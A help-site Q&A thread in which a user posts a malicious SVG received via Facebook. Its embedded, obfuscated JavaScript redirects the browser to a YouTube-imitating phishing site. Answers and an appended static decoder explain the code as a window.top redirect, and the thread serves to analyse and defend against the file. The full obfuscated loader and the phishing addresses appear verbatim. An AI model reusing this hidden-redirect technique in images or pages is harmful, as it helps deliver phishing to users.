I received a Facebook message with two files (SVG pictures), and I clicked one of them (I do not know why :( ). Then a new tab with a red dot opened, and then I was immediately redirected to some site pretending to look like Youtube (http://kerman.pw/?fb_dsa).

Then I downloaded the .svg file using the "Save link as..." function. It seems it is some javascript code embedded into the svg, so I am posting it here (I do not know JS very well):

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function xcxxy(gyqbv,hzrgh,ktjrf){
      var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
      var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
      var bnkdip = "";
      var igrqm = 0;
      while(vyqsvo[igrqm]){
        igrqm++;
      }
      var kwwtmh = 0;
      while(gyqbv[kwwtmh]){
        var jikaig = 0;
        var axfnq = -1;
        while(qixua[jikaig]){
          if(qixua[jikaig] == gyqbv[kwwtmh]){
            axfnq = jikaig;
            break;
          }
          jikaig++;
        }
        if(axfnq >= 0){
          var abxnk = 0;
          var wjtfca = -1;
          while(vyqsvo[kwwtmh%igrqm][abxnk]){
            if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
              wjtfca = abxnk;
              break;
            }
          abxnk++;
          }
          bnkdip += qixua[wjtfca];
        }else{
          bnkdip += gyqbv[kwwtmh];
        }
        kwwtmh++;
      }
      var evhrt = "";
      for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
        evhrt += bnkdip[izqfrv];
      }
      bnkdip = evhrt;
      return bnkdip;
    }
  var obejok = window;
  var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
  var leizjp = xcxxy("kBB?5S:Uh",1,false);
  var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
  obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
  ]]></script>
</svg>

I don't really know javascript, and I wanted to ask what it can do. Could it hurt me? Thank you very much

asked Nov 20, 2016 at 22:54 by videokojot; edited Sep 22, 2018 at 20:03 by Kazuki

  • Don't you have that "Youtube look alike" in your browser history? – Jimmy Adaro, Nov 20, 2016 at 23:02
  • window.top.location.href = "http://mourid./php/trust.php", causing your browser to navigate to that address, which redirects you to various others. The script on its own can't hurt you, but using the site it ultimately takes you to may. Imitating Youtube, it may be trying to phish for your credentials or may try to serve a file that isn't a video. – Jonathan Lonowski, Nov 20, 2016 at 23:18
  • @JimmyAdaro yes, I found it. it is: http://kerman.pw/?fb_dsa . – videokojot, Nov 21, 2016 at 8:19
  • Can I ask why the downvote - so I can avoid it in the future? – videokojot, Nov 21, 2016 at 8:23
  • FYI - if you serve user-uploaded SVGs from your own domain (which maybe you shouldn't), sending the header Content-Security-Policy:default-src *; would say to the browser "you can load scripts, images, or whatever else from any URL you want, but don't execute inline code in <script> tags". It's a very (probably overly) permissive CSP, but would prevent malicious SVGs from doing damage. See content-security-policy. – Nathan Long, Mar 7, 2017 at 14:49

2 Answers

You are correct that the SVG file has embedded javascript. SVGs are vector graphic files which will draw an image in the browser based on the instructions inside the file. The SVG you found contains obfuscated javascript to hide what is actually going on.

At a glance from what I can see, it is a script to open a new browser window and load a new URL, so by itself, it is not dangerous; it all depends on what website it is redirecting you to, and what scripts are set to kick off when you reach the website.

So in short, it CAN harm your computer given the assumption that the site you're being redirected to is malicious.

I hope that helps.

The embedded script redirects your browser to the website http://mourid./php/trust.php, but the script alone is not malicious. The function xcxxy decodes obfuscated strings, and the final line of code is an obfuscated version of window["top"]["location"]["href"] = "http://mourid./php/trust.php", which redirects you to that site. I advise you not to run the script because obfuscation is sometimes used to hide malicious code from plain sight. (Source: Wikipedia)
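
Added example, not part of either answer or of the posted sample: a static decode of the four obfuscated strings in Node.js, so the script's effect can be read without opening the SVG in a browser. The names `decode`, `decodeCalls` and `analyse` are chosen here; the two tables and the four call lines are copied from the script in the question.

```javascript
// Tables copied from the posted script: BASE is `qixua`, KEYS is `vyqsvo`.
const BASE = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
const KEYS = [
  "rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn",
  "RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm",
  "n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s",
  "C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey",
  "9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",
  ":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p",
];

// Readable equivalent of xcxxy(): character i is looked up in KEYS[i % 6] and
// replaced by the character at the same position in BASE. Characters that are
// not in BASE pass through unchanged. The first `skip` decoded characters are
// junk padding and are dropped. (The unused third argument is ignored.)
function decode(cipher, skip) {
  let out = "";
  for (let i = 0; i < cipher.length; i++) {
    const c = cipher[i];
    const pos = BASE.includes(c) ? KEYS[i % KEYS.length].indexOf(c) : -1;
    out += pos >= 0 ? BASE[pos] : c;
  }
  return out.slice(skip);
}

// Find every fnName("<string>", <number>, ...) call in script text and decode it.
function decodeCalls(scriptText, fnName) {
  const re = new RegExp(fnName + '\\("([^"]*)",\\s*(\\d+)', "g");
  return [...scriptText.matchAll(re)].map((m) => decode(m[1], Number(m[2])));
}

// Input embedded for the example: the four call lines of the sample, verbatim.
const SAMPLE_CALLS = `
  var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
  var leizjp = xcxxy("kBB?5S:Uh",1,false);
  var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
  obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
`;

// Rebuild the property chain that is assigned to, and the value assigned.
function analyse() {
  const [a, b, c, target] = decodeCalls(SAMPLE_CALLS, "xcxxy");
  return { sink: `window.${a}.${b}.${c}`, target };
}

console.log(analyse());
```

The decoder only maps characters through lookup tables; it never evaluates the sample's code or contacts the decoded address.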
